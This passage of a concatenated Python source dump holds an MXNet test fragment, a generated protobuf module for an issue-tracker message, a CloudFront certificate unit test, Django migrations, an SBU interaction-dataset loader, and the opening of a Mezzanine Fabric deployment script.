inputs_data = mx.nd.random.uniform(shape=(10, 3, 50))
valid_len = mx.nd.array([1]*10)
outputs, _ = net(inputs_data, valid_len)
assert outputs.shape == (10, 3, 200)
if __name__ == '__main__':
import nose
nose.runmodule()
|
py | b410365883c4fbb3bf5d53fb62a470f3c55d2c0a | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: issue.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from topology_sdk.model.topboard import product_pb2 as topology__sdk_dot_model_dot_topboard_dot_product__pb2
from topology_sdk.model.topboard import sprint_pb2 as topology__sdk_dot_model_dot_topboard_dot_sprint__pb2
from topology_sdk.model.cmdb import user_pb2 as topology__sdk_dot_model_dot_cmdb_dot_user__pb2
from topology_sdk.model.topboard import attachment_pb2 as topology__sdk_dot_model_dot_topboard_dot_attachment__pb2
from topology_sdk.model.topboard import comment_pb2 as topology__sdk_dot_model_dot_topboard_dot_comment__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='issue.proto',
package='topboard',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboard'),
serialized_pb=_b('\n\x0bissue.proto\x12\x08topboard\x1a)topology_sdk/model/topboard/product.proto\x1a(topology_sdk/model/topboard/sprint.proto\x1a\"topology_sdk/model/cmdb/user.proto\x1a,topology_sdk/model/topboard/attachment.proto\x1a)topology_sdk/model/topboard/comment.proto\"\xc4\x06\n\x05Issue\x12\x1f\n\x06parent\x18\x01 \x03(\x0b\x32\x0f.topboard.Issue\x12!\n\x08subtasks\x18\x02 \x03(\x0b\x32\x0f.topboard.Issue\x12\"\n\x07product\x18\x03 \x03(\x0b\x32\x11.topboard.Product\x12 \n\x06sprint\x18\x04 \x03(\x0b\x32\x10.topboard.Sprint\x12\x1f\n\x0bsubscribers\x18\x05 \x03(\x0b\x32\n.cmdb.User\x12\x1c\n\x08\x61ssignee\x18\x06 \x03(\x0b\x32\n.cmdb.User\x12\x1c\n\x08reporter\x18\x07 \x03(\x0b\x32\n.cmdb.User\x12)\n\x0b\x61ttachments\x18\x08 \x03(\x0b\x32\x14.topboard.Attachment\x12#\n\x08\x63omments\x18\t \x03(\x0b\x32\x11.topboard.Comment\x12,\n\tissueFrom\x18\n \x03(\x0b\x32\x19.topboard.Issue.IssueFrom\x12\x1a\n\x06tester\x18\x0b \x03(\x0b\x32\n.cmdb.User\x12\x0c\n\x04name\x18\x0c \x01(\t\x12\x12\n\ninstanceId\x18\r \x01(\t\x12\x0f\n\x07\x63reator\x18\x0e \x01(\t\x12\r\n\x05\x63time\x18\x0f \x01(\t\x12\r\n\x05title\x18\x10 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x11 \x01(\t\x12\x10\n\x08priority\x18\x12 \x01(\t\x12\x0c\n\x04type\x18\x13 \x01(\t\x12\x0c\n\x04step\x18\x14 \x01(\t\x12$\n\x05links\x18\x15 \x03(\x0b\x32\x15.topboard.Issue.Links\x12\x12\n\nstoryPoint\x18\x16 \x01(\t\x12\x12\n\nresolution\x18\x17 \x01(\t\x12\x0e\n\x06status\x18\x18 \x01(\t\x12&\n\x06images\x18\x19 \x03(\x0b\x32\x16.topboard.Issue.Images\x12\x0f\n\x07\x62ugType\x18\x1a \x01(\t\x12\x16\n\x0eresponsibility\x18\x1b \x01(\t\x1a-\n\tIssueFrom\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x12\n\ninstanceId\x18\x02 \x01(\t\x1a#\n\x05Links\x12\r\n\x05title\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\t\x1a#\n\x06Images\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0b\n\x03url\x18\x02 \x01(\tBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/topboardb\x06proto3')
,
dependencies=[topology__sdk_dot_model_dot_topboard_dot_product__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_sprint__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_cmdb_dot_user__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_attachment__pb2.DESCRIPTOR,topology__sdk_dot_model_dot_topboard_dot_comment__pb2.DESCRIPTOR,])
_ISSUE_ISSUEFROM = _descriptor.Descriptor(
name='IssueFrom',
full_name='topboard.Issue.IssueFrom',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.IssueFrom.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Issue.IssueFrom.instanceId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=953,
serialized_end=998,
)
_ISSUE_LINKS = _descriptor.Descriptor(
name='Links',
full_name='topboard.Issue.Links',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Issue.Links.title', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url', full_name='topboard.Issue.Links.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1000,
serialized_end=1035,
)
_ISSUE_IMAGES = _descriptor.Descriptor(
name='Images',
full_name='topboard.Issue.Images',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.Images.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='url', full_name='topboard.Issue.Images.url', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1037,
serialized_end=1072,
)
_ISSUE = _descriptor.Descriptor(
name='Issue',
full_name='topboard.Issue',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='parent', full_name='topboard.Issue.parent', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subtasks', full_name='topboard.Issue.subtasks', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='product', full_name='topboard.Issue.product', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='sprint', full_name='topboard.Issue.sprint', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='subscribers', full_name='topboard.Issue.subscribers', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='assignee', full_name='topboard.Issue.assignee', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='reporter', full_name='topboard.Issue.reporter', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attachments', full_name='topboard.Issue.attachments', index=7,
number=8, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='comments', full_name='topboard.Issue.comments', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='issueFrom', full_name='topboard.Issue.issueFrom', index=9,
number=10, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tester', full_name='topboard.Issue.tester', index=10,
number=11, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='topboard.Issue.name', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='topboard.Issue.instanceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator', full_name='topboard.Issue.creator', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ctime', full_name='topboard.Issue.ctime', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='topboard.Issue.title', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='description', full_name='topboard.Issue.description', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='priority', full_name='topboard.Issue.priority', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='topboard.Issue.type', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='step', full_name='topboard.Issue.step', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='links', full_name='topboard.Issue.links', index=20,
number=21, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='storyPoint', full_name='topboard.Issue.storyPoint', index=21,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='resolution', full_name='topboard.Issue.resolution', index=22,
number=23, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='status', full_name='topboard.Issue.status', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='images', full_name='topboard.Issue.images', index=24,
number=25, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='bugType', full_name='topboard.Issue.bugType', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='responsibility', full_name='topboard.Issue.responsibility', index=26,
number=27, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_ISSUE_ISSUEFROM, _ISSUE_LINKS, _ISSUE_IMAGES, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=236,
serialized_end=1072,
)
_ISSUE_ISSUEFROM.containing_type = _ISSUE
_ISSUE_LINKS.containing_type = _ISSUE
_ISSUE_IMAGES.containing_type = _ISSUE
_ISSUE.fields_by_name['parent'].message_type = _ISSUE
_ISSUE.fields_by_name['subtasks'].message_type = _ISSUE
_ISSUE.fields_by_name['product'].message_type = topology__sdk_dot_model_dot_topboard_dot_product__pb2._PRODUCT
_ISSUE.fields_by_name['sprint'].message_type = topology__sdk_dot_model_dot_topboard_dot_sprint__pb2._SPRINT
_ISSUE.fields_by_name['subscribers'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['assignee'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['reporter'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['attachments'].message_type = topology__sdk_dot_model_dot_topboard_dot_attachment__pb2._ATTACHMENT
_ISSUE.fields_by_name['comments'].message_type = topology__sdk_dot_model_dot_topboard_dot_comment__pb2._COMMENT
_ISSUE.fields_by_name['issueFrom'].message_type = _ISSUE_ISSUEFROM
_ISSUE.fields_by_name['tester'].message_type = topology__sdk_dot_model_dot_cmdb_dot_user__pb2._USER
_ISSUE.fields_by_name['links'].message_type = _ISSUE_LINKS
_ISSUE.fields_by_name['images'].message_type = _ISSUE_IMAGES
DESCRIPTOR.message_types_by_name['Issue'] = _ISSUE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Issue = _reflection.GeneratedProtocolMessageType('Issue', (_message.Message,), {
'IssueFrom' : _reflection.GeneratedProtocolMessageType('IssueFrom', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_ISSUEFROM,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.IssueFrom)
})
,
'Links' : _reflection.GeneratedProtocolMessageType('Links', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_LINKS,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.Links)
})
,
'Images' : _reflection.GeneratedProtocolMessageType('Images', (_message.Message,), {
'DESCRIPTOR' : _ISSUE_IMAGES,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue.Images)
})
,
'DESCRIPTOR' : _ISSUE,
'__module__' : 'issue_pb2'
# @@protoc_insertion_point(class_scope:topboard.Issue)
})
_sym_db.RegisterMessage(Issue)
_sym_db.RegisterMessage(Issue.IssueFrom)
_sym_db.RegisterMessage(Issue.Links)
_sym_db.RegisterMessage(Issue.Images)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
py | b410373dab98bbd95e3ed6a4f02c2fbe215971bb | # Copyright (c) 2016 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from poppy.provider.cloudfront import certificates
from tests.unit import base
class TestCertificates(base.TestCase):
def setUp(self):
super(TestCertificates, self).setUp()
self.driver = mock.Mock()
self.driver.provider_name = 'Cloudfront'
self.controller = certificates.CertificateController(self.driver)
def test_create_certificate(self):
self.assertEqual(
NotImplemented, self.controller.create_certificate({}))
|
py | b41038343d70854d1f257949e3fd840f1b075516 | # Generated by Django 3.1.2 on 2020-10-06 18:29
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(db_index=True, max_length=255, unique=True)),
('email', models.EmailField(max_length=254, unique=True, validators=[django.core.validators.EmailValidator()])),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
|
py | b41038df6cdf546101513a1c40383ca2c5ae9226 | # Generated by Django 3.1 on 2020-08-23 15:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ingredients',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, default='', max_length=200)),
('description', models.CharField(blank=True, default='', max_length=200)),
('category', models.CharField(blank=True, default='', max_length=200)),
('calorie_density', models.CharField(blank=True, default='', max_length=200)),
],
),
migrations.CreateModel(
name='Supplies',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('price', models.CharField(blank=True, default='', max_length=200)),
('servings_per_unit', models.IntegerField(blank=True)),
('expiration_period', models.IntegerField(blank=True)),
('ingredient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='rms_core.ingredients')),
],
),
migrations.CreateModel(
name='Recipes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('add_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date added')),
('instructions', models.CharField(blank=True, default='', max_length=200)),
('serves', models.IntegerField()),
('prep_time', models.IntegerField()),
('calories', models.IntegerField()),
('seasonality', models.CharField(blank=True, default='', max_length=200)),
('rating', models.IntegerField()),
('ingredients', models.ManyToManyField(to='rms_core.Ingredients')),
],
),
migrations.CreateModel(
name='RecipeInstances',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('made_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date made')),
('comments', models.CharField(blank=True, default='', max_length=200)),
('changes', models.CharField(blank=True, default='todo', max_length=200)),
('rating', models.IntegerField()),
('recipe', models.ForeignKey(on_delete=django.db.models.deletion.RESTRICT, to='rms_core.recipes')),
],
),
migrations.CreateModel(
name='Pantry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('servings_remaining', models.IntegerField(blank=True)),
('expiration_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='date expires')),
('supply', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='rms_core.supplies')),
],
),
]
|
py | b41039d3747419a57bfb38036480d7f25f4af4df | import pandas as pd
import numpy as np
import glob
from misc import data_io
DATA_DIR = 'data/sbu/'
""" Folder structure
<set>/
<action_id>/
001/
[002] # not always
[003] # not always
depth_...
rgb_...
skeleton_pos.txt
Ex: DATA_DIR + '/s01s02/02/001/skeleton_pos.txt'
"""
SETS = ['s01s02','s01s03','s01s07','s02s01','s02s03','s02s06','s02s07','s03s02',
's03s04','s03s05','s03s06','s04s02','s04s03','s04s06','s05s02','s05s03',
's06s02','s06s03','s06s04','s07s01','s07s03']
FOLDS = [
[ 1, 9, 15, 19],
[ 5, 7, 10, 16],
[ 2, 3, 20, 21],
[ 4, 6, 8, 11],
[12, 13, 14, 17, 18]]
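# Each FOLDS entry lists 1-based positions into SETS (note the "set_id+1 in lst" check
# in get_ground_truth below); e.g. fold 0 covers s01s02, s03s04, s05s02 and s06s04.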
ACTIONS = ['Approaching','Departing','Kicking','Punching','Pushing','Hugging',
'ShakingHands','Exchanging']
def get_ground_truth(data_dir=DATA_DIR):
setname_lst, fold_lst, seq_lst, action_lst, path_lst = [], [], [], [], []
for set_id, set_name in enumerate(SETS):
for action_id in range(len(ACTIONS)):
search_exp = '{}/{}/{:02}/*'.format(data_dir, set_name, action_id+1)
paths = glob.glob(search_exp)
paths.sort()
for path in paths:
seq = path.split('/')[-1]
fold = np.argwhere([ set_id+1 in lst for lst in FOLDS ])[0,0]
setname_lst.append(set_name)
fold_lst.append(fold)
seq_lst.append(seq)
action_lst.append(action_id)
path_lst.append(path)
dataframe_dict = {'set_name': setname_lst,
'fold': fold_lst,
'seq': seq_lst,
'path': path_lst,
'action': action_lst}
ground_truth = pd.DataFrame(dataframe_dict)
return ground_truth
def get_folds():
folds = np.arange(len(FOLDS))
return folds
def get_train_gt(fold_num):
    if fold_num < 0 or fold_num > 4:
        raise ValueError("fold_num must be between 0 and 4, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold != fold_num]
return gt_split
def get_val_gt(fold_num):
    if fold_num < 0 or fold_num > 4:
        raise ValueError("fold_num must be between 0 and 4, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold == fold_num]
return gt_split
def get_train(fold_num, **kwargs):
    if fold_num < 0 or fold_num > 4:
        raise ValueError("fold_num must be between 0 and 4, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold != fold_num]
X, Y = data_io.get_data(gt_split, pose_style='SBU', **kwargs)
return X, Y
def get_val(fold_num, **kwargs):
    if fold_num < 0 or fold_num > 4:
        raise ValueError("fold_num must be between 0 and 4, value entered: "+str(fold_num))
ground_truth = get_ground_truth()
gt_split = ground_truth[ground_truth.fold == fold_num]
X, Y = data_io.get_data(gt_split, pose_style='SBU', **kwargs)
return X, Y
|
py | b41039efbc1ce3eb8ee63c14545cf97d3875a5a4 | from __future__ import print_function, unicode_literals
from future.builtins import open
import os
import re
import sys
from contextlib import contextmanager
from functools import wraps
from getpass import getpass, getuser
from glob import glob
from importlib import import_module
from posixpath import join
from mezzanine.utils.conf import real_project_name
from fabric.api import abort, env, cd, prefix, sudo as _sudo, run as _run, \
hide, task, local
from fabric.context_managers import settings as fab_settings
from fabric.contrib.console import confirm
from fabric.contrib.files import exists, upload_template
from fabric.contrib.project import rsync_project
from fabric.colors import yellow, green, blue, red
from fabric.decorators import hosts
################
# Config setup #
################
env.proj_app = real_project_name("mysite")
conf = {}
if sys.argv[0].split(os.sep)[-1] in ("fab", "fab-script.py"):
# Ensure we import settings from the current dir
try:
conf = import_module("%s.settings" % env.proj_app).FABRIC
try:
conf["HOSTS"][0]
except (KeyError, ValueError):
raise ImportError
except (ImportError, AttributeError):
print("Aborting, no hosts defined.")
exit()
env.db_pass = conf.get("DB_PASS", None)
env.admin_pass = conf.get("ADMIN_PASS", None)
env.user = conf.get("SSH_USER", getuser())
env.password = conf.get("SSH_PASS", None)
env.key_filename = conf.get("SSH_KEY_PATH", None)
env.hosts = conf.get("HOSTS", [""])
env.proj_name = conf.get("PROJECT_NAME", env.proj_app)
env.venv_home = conf.get("VIRTUALENV_HOME", "/home/%s/.virtualenvs" % env.user)
env.venv_path = join(env.venv_home, env.proj_name)
env.proj_path = "/home/%s/mezzanine/%s" % (env.user, env.proj_name)
env.manage = "%s/bin/python %s/manage.py" % (env.venv_path, env.proj_path)
env.domains = conf.get("DOMAINS", [conf.get("LIVE_HOSTNAME", env.hosts[0])])
env.domains_nginx = " ".join(env.domains)
env.domains_regex = "|".join(env.domains)
env.domains_python = ", ".join(["'%s'" % s for s in env.domains])
env.ssl_disabled = "#" if len(env.domains) > 1 else ""
env.vcs_tools = ["git", "hg"]
env.deploy_tool = conf.get("DEPLOY_TOOL", "rsync")
env.reqs_path = conf.get("REQUIREMENTS_PATH", None)
env.locale = conf.get("LOCALE", "en_US.UTF-8")
env.num_workers = conf.get("NUM_WORKERS",
"multiprocessing.cpu_count() * 2 + 1")
env.secret_key = conf.get("SECRET_KEY", "")
env.nevercache_key = conf.get("NEVERCACHE_KEY", "")
# Remote git repos need to be "bare" and reside separately from the project
if env.deploy_tool == "git":
env.repo_path = "/home/%s/git/%s.git" % (env.user, env.proj_name)
else:
env.repo_path = env.proj_path
##################
# Template setup #
##################
# Each template gets uploaded at deploy time, but only if its contents
# have changed, in which case the reload command is also run
# (see the usage note after the dict below).
templates = {
"nginx": {
"local_path": "deploy/nginx.conf.template",
"remote_path": "/etc/nginx/sites-enabled/%(proj_name)s.conf",
"reload_command": "service nginx restart",
},
"supervisor": {
"local_path": "deploy/supervisor.conf.template",
"remote_path": "/etc/supervisor/conf.d/%(proj_name)s.conf",
"reload_command": "supervisorctl update gunicorn_%(proj_name)s",
},
"cron": {
"local_path": "deploy/crontab.template",
"remote_path": "/etc/cron.d/%(proj_name)s",
"owner": "root",
"mode": "600",
},
"gunicorn": {
"local_path": "deploy/gunicorn.conf.py.template",
"remote_path": "%(proj_path)s/gunicorn.conf.py",
},
"settings": {
"local_path": "deploy/local_settings.py.template",
"remote_path": "%(proj_path)s/%(proj_app)s/local_settings.py",
},
}
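# Usage sketch: during deploy(), each key of this dict is passed to
# upload_template_and_reload() (defined below), e.g.
#   upload_template_and_reload("nginx")
# renders deploy/nginx.conf.template against env, uploads it to
# /etc/nginx/sites-enabled/%(proj_name)s.conf only when its contents differ from the
# remote copy, and then runs "service nginx restart".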
######################################
# Context for virtualenv and project #
######################################
@contextmanager
def virtualenv():
"""
Runs commands within the project's virtualenv.
"""
with cd(env.venv_path):
with prefix("source %s/bin/activate" % env.venv_path):
yield
@contextmanager
def project():
"""
Runs commands within the project's directory.
"""
with virtualenv():
with cd(env.proj_path):
yield
@contextmanager
def update_changed_requirements():
"""
Checks for changes in the requirements file across an update,
and gets new requirements if changes have occurred.
"""
reqs_path = join(env.proj_path, env.reqs_path)
get_reqs = lambda: run("cat %s" % reqs_path, show=False)
old_reqs = get_reqs() if env.reqs_path else ""
yield
if old_reqs:
new_reqs = get_reqs()
if old_reqs == new_reqs:
# Unpinned requirements should always be checked.
for req in new_reqs.split("\n"):
if req.startswith("-e"):
if "@" not in req:
# Editable requirement without pinned commit.
break
elif req.strip() and not req.startswith("#"):
if not set(">=<") & set(req):
# PyPI requirement without version.
break
else:
# All requirements are pinned.
return
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
###########################################
# Utils and wrappers for various commands #
###########################################
def _print(output):
print()
